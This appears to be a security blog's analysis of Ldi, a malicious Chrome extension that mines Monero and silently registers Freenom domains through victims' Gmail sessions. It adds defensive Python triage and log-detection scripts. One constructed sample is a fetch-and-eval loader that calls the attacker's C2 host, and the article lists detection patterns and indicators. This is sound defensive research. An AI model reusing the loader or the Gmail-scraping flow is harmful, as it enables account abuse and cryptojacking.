With Chrome being the most widely used web browser, attackers are developing more advanced malicious extensions for it every day. Whether it's impersonating popular extensions to deliver ads, hijacking search queries, or injecting the Coinhive browser miner, it is easy to see that malicious extensions are on the rise.
The extension we are going to look at today, called Ldi, takes malicious behavior to the next level. Not only does it load the Coinhive browser miner into the victim's browser and consume all available CPU, it also uses the victim's logged-in Gmail account to register free domains for the attackers through Freenom.
When I dug down further and examined the source, though, it was obvious that this was not our garden-variety unwanted extension.
Currently, the remote script that is sent back to be executed is http://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json. Despite its .json name, this script is the meat of the extension: it is the code that performs the various malicious activities, such as loading Coinhive and registering domains through your Gmail account. Because the real logic lives on the attacker's server rather than in the installed package, it can be changed at any time without pushing an update through the Chrome Web Store.
Once the browser starts, the above malicious script is executed and the fun begins.
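The fetch-and-execute loader pattern is the first thing to look for when triaging an extension like this. The following is an added example written for this article, not code from the extension or from the article's author: a small static triage script that reads an unpacked extension's manifest.json and background scripts, flags broad host permissions, hard-coded URLs, and code sinks (eval, the Function constructor, executeScript with a code string, injected script elements), and reports when remote content reaches one of those sinks. The manifest and background.js it inspects are constructed samples; the use of eval() to run the downloaded script is an assumption for illustration, not something this article confirms about Ldi.

```python
import json
import re

# Constructed sample of an unpacked extension; not the real Ldi package.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Ldi",
    "version": "1.0",
    "permissions": ["tabs", "storage", "webRequest", "<all_urls>"],
    "background": {"scripts": ["background.js"], "persistent": True},
})

# Constructed loader; the eval() sink is an assumption for illustration.
SAMPLE_BACKGROUND_JS = r"""
var cfg = 'http://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json';
chrome.runtime.onStartup.addListener(function () {
  var x = new XMLHttpRequest();
  x.open('GET', cfg + '?t=' + Date.now(), true);
  x.onload = function () { eval(x.responseText); };
  x.send();
});
"""

# Origins whose presence in host permissions deserves a closer look.
SENSITIVE_ORIGINS = ("mail.google.com", "facebook.com", "freenom.com", "coinhive.com")
# Match patterns that grant access to every site.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Sinks through which downloaded text can become executing code.
REMOTE_CODE_PATTERNS = [
    ("eval()", re.compile(r"\beval\s*\(")),
    ("Function constructor", re.compile(r"\bnew\s+Function\s*\(")),
    ("executeScript with code string", re.compile(r"executeScript\s*\(\s*[^)]*\bcode\s*:")),
    ("script element injection", re.compile(r"createElement\s*\(\s*['\"]script['\"]")),
]
URL_PATTERN = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"]*)?")


def triage(manifest_text, scripts):
    """Return (verdict, findings) for a manifest string and a {filename: source} dict."""
    manifest = json.loads(manifest_text)
    findings = []

    # Manifest v2 puts host patterns in "permissions"; v3 uses "host_permissions".
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    broad = perms & BROAD_HOSTS
    if broad:
        findings.append("broad host permissions: " + ", ".join(sorted(broad)))
    for p in sorted(perms):
        if any(origin in p for origin in SENSITIVE_ORIGINS):
            findings.append("host permission on sensitive origin: " + p)

    remote_code = False
    for name, src in scripts.items():
        urls = {u.rstrip("/") for u in URL_PATTERN.findall(src)}
        sinks = [label for label, pat in REMOTE_CODE_PATTERNS if pat.search(src)]
        for u in sorted(urls):
            findings.append(f"{name}: hardcoded URL {u}")
        # A hard-coded URL plus a code sink in the same file is the loader signature.
        if urls and sinks:
            remote_code = True
            findings.append(f"{name}: fetches remote content and reaches a code sink ({', '.join(sinks)})")

    if broad and remote_code:
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return verdict, findings


if __name__ == "__main__":
    verdict, findings = triage(SAMPLE_MANIFEST, {"background.js": SAMPLE_BACKGROUND_JS})
    print(verdict)
    for f in findings:
        print(" -", f)
```

The script is deliberately coarse: a legitimate extension can use eval on its own bundled code, so the verdict is "suspicious" only when broad host access and a remote-content-to-sink path occur together, and everything else is left for manual review.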
First, the extension will connect to Facebook. While I did not see it do anything other than connect, there is quite a lot of code dedicated to Facebook, which could be for spreading the extension via Facebook Messenger. Unfortunately, I did not have the time to review that part of the code as much as I would have liked.
The extension then loads Coinhive so that the browser begins mining Monero for the developer.
After that, it begins the process of registering domain names using your Gmail account. First, it connects to Freenom.com by POSTing to the URL https://my.freenom.com/includes/domains/fn-available.php and checking whether a randomly named domain is available under various TLDs. In this example, it was checking what was available for the string "jihafivagobumini".
Once it retrieves the available domain options, it adds each of those domains to a cart using the URL https://my.freenom.com/includes/domains/fn-additional.php.
When it is done adding the domains, it starts the checkout process, which needs an email address and registrant details to register the domains under. To get the email address, it loads the URL https://mail.google.com/mail/u/0/h/1pq68r75kdvdr/?v=lui, which switches the logged-in Gmail session to the basic HTML view; that simplified page makes it easy to scrape the address of the logged-in user. If the user is not logged into Gmail, the extension is unable to register the domains.
It then connects to https://randomuser.me/api/0.4/?randomapi to generate random registrant information (name, address and so on) that can be used during the checkout.
Now that it has both an email address and random registrant information, it finishes the checkout process at Freenom. In order to complete the registration, though, the registrant has to confirm the email address. The extension handles this as well: it checks the Gmail account for Freenom's verification email and automatically opens the verification link. The only trace a victim is likely to notice is that confirmation email sitting in their inbox.
This results in four domains being registered for the extension developer, but under the victim's Gmail address, so the domains are tied to the victim's identity rather than the attacker's. This is done each time the extension is installed in Chrome.
Once the domains have been registered, it sends this information back to the C2 server at http://fbcdnxy.net/.
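The registration flow described above leaves a recognizable sequence in web proxy or DNS logs: a POST to Freenom's fn-available.php and fn-additional.php, a request for the Gmail HTML view with v=lui, and a call to randomuser.me, all from one client within minutes. The following is an added example written for this article, not code from the article's author: a detector that classifies each request into a stage of the flow and alerts when the Freenom availability check, the Gmail HTML view and the randomuser.me call all appear from the same client inside a ten-minute window. The log format (timestamp, client IP, method, URL) and the log lines themselves are constructed; the Coinhive library URL in the sample is there only to show the miner stage being tagged alongside the rest.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed proxy log: "timestamp client method url", one request per line.
SAMPLE_LOG = """\
2018-03-10T09:00:01Z 10.1.1.5 GET http://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json
2018-03-10T09:00:04Z 10.1.1.5 GET https://coinhive.com/lib/coinhive.min.js
2018-03-10T09:00:09Z 10.1.1.5 POST https://my.freenom.com/includes/domains/fn-available.php
2018-03-10T09:00:11Z 10.1.1.5 POST https://my.freenom.com/includes/domains/fn-additional.php
2018-03-10T09:00:12Z 10.1.1.5 GET https://mail.google.com/mail/u/0/h/1pq68r75kdvdr/?v=lui
2018-03-10T09:00:13Z 10.1.1.5 GET https://randomuser.me/api/0.4/?randomapi
2018-03-10T09:00:40Z 10.1.1.5 POST http://fbcdnxy.net/
2018-03-10T09:05:00Z 10.1.1.9 GET https://my.freenom.com/includes/domains/fn-available.php
2018-03-10T10:15:00Z 10.1.1.9 GET https://mail.google.com/mail/u/0/
"""

# The three stages that only make sense together when automated from one client.
REQUIRED = {"freenom_search", "gmail_html_view", "fake_identity"}


def classify(url):
    """Map a request URL to a stage of the Ldi registration flow, or None."""
    u = urlparse(url)
    host, path, query = u.hostname or "", u.path, parse_qs(u.query)
    if host == "fbcdnxy.net":
        return "c2"
    if host.endswith("freenom.com") and path.endswith("/fn-available.php"):
        return "freenom_search"
    if host.endswith("freenom.com") and path.endswith("/fn-additional.php"):
        return "freenom_cart"
    # Basic HTML Gmail lives under /mail/u/<n>/h/ and the switch carries v=lui.
    if host == "mail.google.com" and "/h/" in path and query.get("v") == ["lui"]:
        return "gmail_html_view"
    if host == "randomuser.me" and path.startswith("/api"):
        return "fake_identity"
    if host == "coinhive.com":
        return "miner"
    return None


def parse_log(text):
    """Yield (timestamp, client, stage) for every request that matches a stage."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(maxsplit=3)
        stage = classify(url)
        if stage:
            events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, stage))
    return events


def detect(text, window=timedelta(minutes=10)):
    """Return {client: sorted stages seen} for clients that complete the flow in one window."""
    by_client = defaultdict(list)
    for ts, client, stage in parse_log(text):
        by_client[client].append((ts, stage))
    alerts = {}
    for client, events in by_client.items():
        events.sort()
        # Slide a window starting at each event; alert on the first window that fits.
        for i, (start, _) in enumerate(events):
            seen = {stage for t, stage in events[i:] if t - start <= window}
            if REQUIRED <= seen:
                alerts[client] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for client, stages in detect(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

A user who visits Freenom and later reads Gmail will not trip this rule: 10.1.1.9 in the sample touches fn-available.php and the normal Gmail interface an hour apart and is not flagged. The randomuser.me call is the strongest single indicator here, because a human registering a domain has no reason to fetch a fabricated identity from an API.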
At this time it is not known what these domains are being used for, but they could easily be used to distribute malware, further spread the extension, or host phishing pages. Whatever the purpose, with each victim registering four domains for the developer, and some malicious extensions having hundreds if not thousands of users, this quickly adds up to a huge arsenal of domains for the attacker, none of which are registered under the attacker's own identity.
As I, and others, research this extension further I will update this article with any relevant information that is discovered.
Network indicators observed for this extension:
http://fbcdnxy.net/
http://fairexttrades.com/
https://my.freenom.com/
https://www.facebook.com/
https://coinhive.com/
https://mail.google.com/mail/
https://randomuser.me/